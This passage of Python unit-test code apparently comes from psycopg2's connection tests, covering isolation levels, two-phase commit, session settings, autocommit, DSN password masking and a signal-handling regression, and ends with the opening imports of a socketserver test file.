conn.isolation_level, psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED
)
def test_isolation_level_autocommit(self):
cnn1 = self.connect()
cnn2 = self.connect()
cnn2.set_isolation_level(ext.ISOLATION_LEVEL_AUTOCOMMIT)
cur1 = cnn1.cursor()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(0, cur1.fetchone()[0])
cnn1.commit()
cur2 = cnn2.cursor()
cur2.execute("insert into isolevel values (10);")
cur1.execute("select count(*) from isolevel;")
self.assertEqual(1, cur1.fetchone()[0])
def test_isolation_level_read_committed(self):
cnn1 = self.connect()
cnn2 = self.connect()
cnn2.set_isolation_level(ext.ISOLATION_LEVEL_READ_COMMITTED)
cur1 = cnn1.cursor()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(0, cur1.fetchone()[0])
cnn1.commit()
cur2 = cnn2.cursor()
cur2.execute("insert into isolevel values (10);")
cur1.execute("insert into isolevel values (20);")
cur2.execute("select count(*) from isolevel;")
self.assertEqual(1, cur2.fetchone()[0])
cnn1.commit()
cur2.execute("select count(*) from isolevel;")
self.assertEqual(2, cur2.fetchone()[0])
cur1.execute("select count(*) from isolevel;")
self.assertEqual(1, cur1.fetchone()[0])
cnn2.commit()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(2, cur1.fetchone()[0])
def test_isolation_level_serializable(self):
cnn1 = self.connect()
cnn2 = self.connect()
cnn2.set_isolation_level(ext.ISOLATION_LEVEL_SERIALIZABLE)
cur1 = cnn1.cursor()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(0, cur1.fetchone()[0])
cnn1.commit()
cur2 = cnn2.cursor()
cur2.execute("insert into isolevel values (10);")
cur1.execute("insert into isolevel values (20);")
cur2.execute("select count(*) from isolevel;")
self.assertEqual(1, cur2.fetchone()[0])
cnn1.commit()
cur2.execute("select count(*) from isolevel;")
self.assertEqual(1, cur2.fetchone()[0])
cur1.execute("select count(*) from isolevel;")
self.assertEqual(1, cur1.fetchone()[0])
cnn2.commit()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(2, cur1.fetchone()[0])
cur2.execute("select count(*) from isolevel;")
self.assertEqual(2, cur2.fetchone()[0])
def test_isolation_level_closed(self):
cnn = self.connect()
cnn.close()
self.assertRaises(psycopg2.InterfaceError, cnn.set_isolation_level, 0)
self.assertRaises(psycopg2.InterfaceError, cnn.set_isolation_level, 1)
def test_setattr_isolation_level_int(self):
cur = self.conn.cursor()
self.conn.isolation_level = ext.ISOLATION_LEVEL_SERIALIZABLE
self.assertEqual(self.conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.isolation_level = ext.ISOLATION_LEVEL_REPEATABLE_READ
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_REPEATABLE_READ
)
self.assertEqual(cur.fetchone()[0], "repeatable read")
else:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE
)
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.isolation_level = ext.ISOLATION_LEVEL_READ_COMMITTED
self.assertEqual(self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_COMMITTED)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.isolation_level = ext.ISOLATION_LEVEL_READ_UNCOMMITTED
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_UNCOMMITTED
)
self.assertEqual(cur.fetchone()[0], "read uncommitted")
else:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_COMMITTED
)
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.assertEqual(ext.ISOLATION_LEVEL_DEFAULT, None)
self.conn.isolation_level = ext.ISOLATION_LEVEL_DEFAULT
self.assertEqual(self.conn.isolation_level, None)
cur.execute("SHOW transaction_isolation;")
isol = cur.fetchone()[0]
cur.execute("SHOW default_transaction_isolation;")
self.assertEqual(cur.fetchone()[0], isol)
def test_setattr_isolation_level_str(self):
cur = self.conn.cursor()
self.conn.isolation_level = "serializable"
self.assertEqual(self.conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.isolation_level = "repeatable read"
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_REPEATABLE_READ
)
self.assertEqual(cur.fetchone()[0], "repeatable read")
else:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE
)
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.isolation_level = "read committed"
self.assertEqual(self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_COMMITTED)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.isolation_level = "read uncommitted"
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_UNCOMMITTED
)
self.assertEqual(cur.fetchone()[0], "read uncommitted")
else:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_COMMITTED
)
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.isolation_level = "default"
self.assertEqual(self.conn.isolation_level, None)
cur.execute("SHOW transaction_isolation;")
isol = cur.fetchone()[0]
cur.execute("SHOW default_transaction_isolation;")
self.assertEqual(cur.fetchone()[0], isol)
def test_setattr_isolation_level_invalid(self):
self.assertRaises(ValueError, setattr, self.conn, "isolation_level", 0)
self.assertRaises(ValueError, setattr, self.conn, "isolation_level", -1)
self.assertRaises(ValueError, setattr, self.conn, "isolation_level", 5)
self.assertRaises(ValueError, setattr, self.conn, "isolation_level", "bah")
def test_attribs_segfault(self):
# bug #790
for i in range(10000):
self.conn.autocommit
self.conn.readonly
self.conn.deferrable
self.conn.isolation_level
class ConnectionTwoPhaseTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
self.make_test_table()
self.clear_test_xacts()
def tearDown(self):
self.clear_test_xacts()
ConnectingTestCase.tearDown(self)
def clear_test_xacts(self):
"""Rollback all the prepared transaction in the testing db."""
cnn = self.connect()
cnn.set_isolation_level(0)
cur = cnn.cursor()
try:
cur.execute(
"select gid from pg_prepared_xacts where database = %s", (dbname,)
)
except psycopg2.ProgrammingError:
cnn.rollback()
cnn.close()
return
gids = [r[0] for r in cur]
for gid in gids:
cur.execute("rollback prepared %s;", (gid,))
cnn.close()
def make_test_table(self):
cnn = self.connect()
cur = cnn.cursor()
try:
cur.execute("DROP TABLE test_tpc;")
except psycopg2.ProgrammingError:
cnn.rollback()
cur.execute("CREATE TABLE test_tpc (data text);")
cnn.commit()
cnn.close()
def count_xacts(self):
"""Return the number of prepared xacts currently in the test db."""
cnn = self.connect()
cur = cnn.cursor()
cur.execute(
"""
select count(*) from pg_prepared_xacts
where database = %s;""",
(dbname,),
)
rv = cur.fetchone()[0]
cnn.close()
return rv
def count_test_records(self):
"""Return the number of records in the test table."""
cnn = self.connect()
cur = cnn.cursor()
cur.execute("select count(*) from test_tpc;")
rv = cur.fetchone()[0]
cnn.close()
return rv
def test_tpc_commit(self):
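# Two-phase commit flow exercised here: tpc_begin() -> work -> tpc_prepare()
# (the transaction appears in pg_prepared_xacts but the row is not yet
# visible) -> tpc_commit() (the prepared xact is gone and the row is visible).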
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_commit');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_prepare()
self.assertEqual(cnn.status, ext.STATUS_PREPARED)
self.assertEqual(1, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_commit()
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(1, self.count_test_records())
def test_tpc_commit_one_phase(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_commit_1p');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_commit()
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(1, self.count_test_records())
def test_tpc_commit_recovered(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_commit_rec');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_prepare()
cnn.close()
self.assertEqual(1, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
cnn.tpc_commit(xid)
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(1, self.count_test_records())
def test_tpc_rollback(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_rollback');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_prepare()
self.assertEqual(cnn.status, ext.STATUS_PREPARED)
self.assertEqual(1, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_rollback()
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
def test_tpc_rollback_one_phase(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_rollback_1p');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_rollback()
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
def test_tpc_rollback_recovered(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_commit_rec');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_prepare()
cnn.close()
self.assertEqual(1, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
cnn.tpc_rollback(xid)
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
def test_status_after_recover(self):
cnn = self.connect()
self.assertEqual(ext.STATUS_READY, cnn.status)
cnn.tpc_recover()
self.assertEqual(ext.STATUS_READY, cnn.status)
cur = cnn.cursor()
cur.execute("select 1")
self.assertEqual(ext.STATUS_BEGIN, cnn.status)
cnn.tpc_recover()
self.assertEqual(ext.STATUS_BEGIN, cnn.status)
def test_recovered_xids(self):
# insert a few test xns
cnn = self.connect()
cnn.set_isolation_level(0)
cur = cnn.cursor()
cur.execute("begin; prepare transaction '1-foo';")
cur.execute("begin; prepare transaction '2-bar';")
# read the values to return
cur.execute(
"""
select gid, prepared, owner, database
from pg_prepared_xacts
where database = %s;""",
(dbname,),
)
okvals = cur.fetchall()
okvals.sort()
cnn = self.connect()
xids = cnn.tpc_recover()
xids = [xid for xid in xids if xid.database == dbname]
xids.sort(key=attrgetter("gtrid"))
# check the values returned
self.assertEqual(len(okvals), len(xids))
for (xid, (gid, prepared, owner, database)) in zip(xids, okvals):
self.assertEqual(xid.gtrid, gid)
self.assertEqual(xid.prepared, prepared)
self.assertEqual(xid.owner, owner)
self.assertEqual(xid.database, database)
def test_xid_encoding(self):
cnn = self.connect()
xid = cnn.xid(42, "gtrid", "bqual")
cnn.tpc_begin(xid)
cnn.tpc_prepare()
cnn = self.connect()
cur = cnn.cursor()
cur.execute("select gid from pg_prepared_xacts where database = %s;", (dbname,))
self.assertEqual("42_Z3RyaWQ=_YnF1YWw=", cur.fetchone()[0])
@slow
def test_xid_roundtrip(self):
for fid, gtrid, bqual in [
(0, "", ""),
(42, "gtrid", "bqual"),
(0x7fffffff, "x" * 64, "y" * 64),
]:
cnn = self.connect()
xid = cnn.xid(fid, gtrid, bqual)
cnn.tpc_begin(xid)
cnn.tpc_prepare()
cnn.close()
cnn = self.connect()
xids = [x for x in cnn.tpc_recover() if x.database == dbname]
self.assertEqual(1, len(xids))
xid = xids[0]
self.assertEqual(xid.format_id, fid)
self.assertEqual(xid.gtrid, gtrid)
self.assertEqual(xid.bqual, bqual)
cnn.tpc_rollback(xid)
@slow
def test_unparsed_roundtrip(self):
for tid in [
"",
"hello, world!",
"x" * 199, # PostgreSQL's limit in transaction id length
]:
cnn = self.connect()
cnn.tpc_begin(tid)
cnn.tpc_prepare()
cnn.close()
cnn = self.connect()
xids = [x for x in cnn.tpc_recover() if x.database == dbname]
self.assertEqual(1, len(xids))
xid = xids[0]
self.assertEqual(xid.format_id, None)
self.assertEqual(xid.gtrid, tid)
self.assertEqual(xid.bqual, None)
cnn.tpc_rollback(xid)
def test_xid_construction(self):
from psycopg2.extensions import Xid
x1 = Xid(74, "foo", "bar")
self.assertEqual(74, x1.format_id)
self.assertEqual("foo", x1.gtrid)
self.assertEqual("bar", x1.bqual)
def test_xid_from_string(self):
from psycopg2.extensions import Xid
x2 = Xid.from_string("42_Z3RyaWQ=_YnF1YWw=")
self.assertEqual(42, x2.format_id)
self.assertEqual("gtrid", x2.gtrid)
self.assertEqual("bqual", x2.bqual)
x3 = Xid.from_string("99_xxx_yyy")
self.assertEqual(None, x3.format_id)
self.assertEqual("99_xxx_yyy", x3.gtrid)
self.assertEqual(None, x3.bqual)
def test_xid_to_string(self):
from psycopg2.extensions import Xid
x1 = Xid.from_string("42_Z3RyaWQ=_YnF1YWw=")
self.assertEqual(str(x1), "42_Z3RyaWQ=_YnF1YWw=")
x2 = Xid.from_string("99_xxx_yyy")
self.assertEqual(str(x2), "99_xxx_yyy")
def test_xid_unicode(self):
cnn = self.connect()
x1 = cnn.xid(10, "uni", "code")
cnn.tpc_begin(x1)
cnn.tpc_prepare()
cnn.reset()
xid = [x for x in cnn.tpc_recover() if x.database == dbname][0]
self.assertEqual(10, xid.format_id)
self.assertEqual("uni", xid.gtrid)
self.assertEqual("code", xid.bqual)
def test_xid_unicode_unparsed(self):
# We don't expect people shooting snowmen as transaction ids,
# so if something explodes in an encoding error I don't mind.
# Let's just check that unicode is accepted as the type.
cnn = self.connect()
cnn.set_client_encoding("utf8")
cnn.tpc_begin("transaction-id")
cnn.tpc_prepare()
cnn.reset()
xid = [x for x in cnn.tpc_recover() if x.database == dbname][0]
self.assertEqual(None, xid.format_id)
self.assertEqual("transaction-id", xid.gtrid)
self.assertEqual(None, xid.bqual)
def test_cancel_fails_prepared(self):
cnn = self.connect()
cnn.tpc_begin("cancel")
cnn.tpc_prepare()
self.assertRaises(psycopg2.ProgrammingError, cnn.cancel)
def test_tpc_recover_non_dbapi_connection(self):
from psycopg2.extras import RealDictConnection
cnn = self.connect(connection_factory=RealDictConnection)
cnn.tpc_begin("dict-connection")
cnn.tpc_prepare()
cnn.reset()
xids = cnn.tpc_recover()
xid = [x for x in xids if x.database == dbname][0]
self.assertEqual(None, xid.format_id)
self.assertEqual("dict-connection", xid.gtrid)
self.assertEqual(None, xid.bqual)
decorate_all_tests(ConnectionTwoPhaseTests, skip_if_tpc_disabled)
class TransactionControlTests(ConnectingTestCase):
def test_closed(self):
self.conn.close()
self.assertRaises(
psycopg2.InterfaceError,
self.conn.set_session,
ext.ISOLATION_LEVEL_SERIALIZABLE,
)
def test_not_in_transaction(self):
cur = self.conn.cursor()
cur.execute("select 1")
self.assertRaises(
psycopg2.ProgrammingError,
self.conn.set_session,
ext.ISOLATION_LEVEL_SERIALIZABLE,
)
def test_set_isolation_level(self):
cur = self.conn.cursor()
self.conn.set_session(ext.ISOLATION_LEVEL_SERIALIZABLE)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.set_session(ext.ISOLATION_LEVEL_REPEATABLE_READ)
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(cur.fetchone()[0], "repeatable read")
else:
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.set_session(isolation_level=ext.ISOLATION_LEVEL_READ_COMMITTED)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.set_session(isolation_level=ext.ISOLATION_LEVEL_READ_UNCOMMITTED)
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(cur.fetchone()[0], "read uncommitted")
else:
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
def test_set_isolation_level_str(self):
cur = self.conn.cursor()
self.conn.set_session("serializable")
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.set_session("repeatable read")
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(cur.fetchone()[0], "repeatable read")
else:
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.set_session("read committed")
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.set_session("read uncommitted")
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(cur.fetchone()[0], "read uncommitted")
else:
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
def test_bad_isolation_level(self):
self.assertRaises(ValueError, self.conn.set_session, 0)
self.assertRaises(ValueError, self.conn.set_session, 5)
self.assertRaises(ValueError, self.conn.set_session, "whatever")
def test_set_read_only(self):
self.assertTrue(self.conn.readonly is None)
cur = self.conn.cursor()
self.conn.set_session(readonly=True)
self.assertTrue(self.conn.readonly is True)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
self.conn.set_session(readonly=False)
self.assertTrue(self.conn.readonly is False)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "off")
self.conn.rollback()
def test_setattr_read_only(self):
cur = self.conn.cursor()
self.conn.readonly = True
self.assertTrue(self.conn.readonly is True)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.assertRaises(
self.conn.ProgrammingError, setattr, self.conn, "readonly", False
)
self.assertTrue(self.conn.readonly is True)
self.conn.rollback()
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
cur = self.conn.cursor()
self.conn.readonly = None
self.assertTrue(self.conn.readonly is None)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "off") # assume defined by server
self.conn.rollback()
self.conn.readonly = False
self.assertTrue(self.conn.readonly is False)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "off")
self.conn.rollback()
def test_set_default(self):
cur = self.conn.cursor()
cur.execute("SHOW transaction_isolation;")
isolevel = cur.fetchone()[0]
cur.execute("SHOW transaction_read_only;")
readonly = cur.fetchone()[0]
self.conn.rollback()
self.conn.set_session(isolation_level="serializable", readonly=True)
self.conn.set_session(isolation_level="default", readonly="default")
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], isolevel)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], readonly)
@skip_before_postgres(9, 1)
def test_set_deferrable(self):
self.assertTrue(self.conn.deferrable is None)
cur = self.conn.cursor()
self.conn.set_session(readonly=True, deferrable=True)
self.assertTrue(self.conn.deferrable is True)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
self.conn.set_session(deferrable=False)
self.assertTrue(self.conn.deferrable is False)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "off")
self.conn.rollback()
@skip_after_postgres(9, 1)
def test_set_deferrable_error(self):
self.assertRaises(
psycopg2.ProgrammingError,
self.conn.set_session,
readonly=True,
deferrable=True,
)
self.assertRaises(
psycopg2.ProgrammingError, setattr, self.conn, "deferrable", True
)
@skip_before_postgres(9, 1)
def test_setattr_deferrable(self):
cur = self.conn.cursor()
self.conn.deferrable = True
self.assertTrue(self.conn.deferrable is True)
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "on")
self.assertRaises(
self.conn.ProgrammingError, setattr, self.conn, "deferrable", False
)
self.assertTrue(self.conn.deferrable is True)
self.conn.rollback()
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
cur = self.conn.cursor()
self.conn.deferrable = None
self.assertTrue(self.conn.deferrable is None)
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "off") # assume defined by server
self.conn.rollback()
self.conn.deferrable = False
self.assertTrue(self.conn.deferrable is False)
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "off")
self.conn.rollback()
def test_mixing_session_attribs(self):
cur = self.conn.cursor()
self.conn.autocommit = True
self.conn.readonly = True
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
cur.execute("SHOW default_transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.autocommit = False
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
cur.execute("SHOW default_transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "off")
def test_idempotence_check(self):
self.conn.autocommit = False
self.conn.readonly = True
self.conn.autocommit = True
self.conn.readonly = True
cur = self.conn.cursor()
cur.execute("SHOW transaction_read_only")
self.assertEqual(cur.fetchone()[0], "on")
class AutocommitTests(ConnectingTestCase):
def test_closed(self):
self.conn.close()
self.assertRaises(
psycopg2.InterfaceError, setattr, self.conn, "autocommit", True
)
# The getter doesn't have a guard. We may change this in future
# to make it consistent with other methods; meanwhile let's just check
# it doesn't explode.
try:
self.assertTrue(self.conn.autocommit in (True, False))
except psycopg2.InterfaceError:
pass
def test_default_no_autocommit(self):
self.assertTrue(not self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur = self.conn.cursor()
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_BEGIN)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_INTRANS
)
self.conn.rollback()
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
def test_set_autocommit(self):
self.conn.autocommit = True
self.assertTrue(self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur = self.conn.cursor()
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
self.conn.autocommit = False
self.assertTrue(not self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_BEGIN)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_INTRANS
)
def test_set_intrans_error(self):
cur = self.conn.cursor()
cur.execute("select 1;")
self.assertRaises(
psycopg2.ProgrammingError, setattr, self.conn, "autocommit", True
)
def test_set_session_autocommit(self):
self.conn.set_session(autocommit=True)
self.assertTrue(self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur = self.conn.cursor()
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
self.conn.set_session(autocommit=False)
self.assertTrue(not self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_BEGIN)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_INTRANS
)
self.conn.rollback()
self.conn.set_session("serializable", readonly=True, autocommit=True)
self.assertTrue(self.conn.autocommit)
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
class PasswordLeakTestCase(ConnectingTestCase):
def setUp(self):
super(PasswordLeakTestCase, self).setUp()
PasswordLeakTestCase.dsn = None
class GrassingConnection(ext.connection):
"""A connection snitching the dsn away.
This connection passes the dsn to the test case class even if init
fails (e.g. connection error). Test that we mangle the dsn ok anyway.
"""
def __init__(self, *args, **kwargs):
try:
super(PasswordLeakTestCase.GrassingConnection, self).__init__(
*args, **kwargs
)
finally:
# The connection is not initialized entirely, however the C
# code should have set the dsn, and it should have scrubbed
# the password away
PasswordLeakTestCase.dsn = self.dsn
def test_leak(self):
self.assertRaises(
psycopg2.DatabaseError,
self.GrassingConnection,
"dbname=nosuch password=whateva",
)
self.assertDsnEqual(self.dsn, "dbname=nosuch password=xxx")
@skip_before_libpq(9, 2)
def test_url_leak(self):
self.assertRaises(
psycopg2.DatabaseError,
self.GrassingConnection,
"postgres://someone:whateva@localhost/nosuch",
)
self.assertDsnEqual(
self.dsn, "user=someone password=xxx host=localhost dbname=nosuch"
)
class SignalTestCase(ConnectingTestCase):
@slow
@skip_before_postgres(8, 2)
def test_bug_551_returning(self):
# Raise an exception trying to decode 'id'
self._test_bug_551(
query="""
INSERT INTO test551 (num) VALUES (%s) RETURNING id
"""
)
@slow
def test_bug_551_no_returning(self):
# Raise an exception trying to decode 'INSERT 0 1'
self._test_bug_551(
query="""
INSERT INTO test551 (num) VALUES (%s)
"""
)
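# The helper below (regression check for bug #551) spawns a subprocess that loops on
# execute() while a daemon thread delivers SIGABRT to it; the custom handler turns the
# signal into sys.exit(1), and the assertions verify that the process exits non-zero
# without spilling tracebacks or interpreter noise onto stderr.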
def _test_bug_551(self, query):
script = """\
import os
import sys
import time
import signal
import warnings
import threading
# ignore wheel deprecation warning
with warnings.catch_warnings():
warnings.simplefilter('ignore')
import psycopg2
def handle_sigabort(sig, frame):
sys.exit(1)
def killer():
time.sleep(0.5)
os.kill(os.getpid(), signal.SIGABRT)
signal.signal(signal.SIGABRT, handle_sigabort)
conn = psycopg2.connect(%(dsn)r)
cur = conn.cursor()
cur.execute("create table test551 (id serial, num varchar(50))")
t = threading.Thread(target=killer)
t.daemon = True
t.start()
while True:
cur.execute(%(query)r, ("Hello, world!",))
""" % {
"dsn": dsn,
"query": query,
}
proc = sp.Popen(
[sys.executable, "-c", script_to_py3(script)],
stdout=sp.PIPE,
stderr=sp.PIPE,
)
(out, err) = proc.communicate()
self.assertNotEqual(proc.returncode, 0)
# Strip [NNN refs] from output
err = re.sub(br"\[[^\]]+\]", b"", err).strip()
self.assertTrue(not err, err)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
test_socketserver.py
|
"""
Test suite for socketserver.
"""
import contextlib
import io
import os
import select
import signal
import socket
import tempfile
import unittest
import socketserver
import test.support
from test.support import reap_children, reap_threads, verbose
try:
import threading
except ImportError:
threading = None
test.support.requires("network")
TEST_STR = b"hello world\n"
HOST = test.support.HOST
HAVE_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
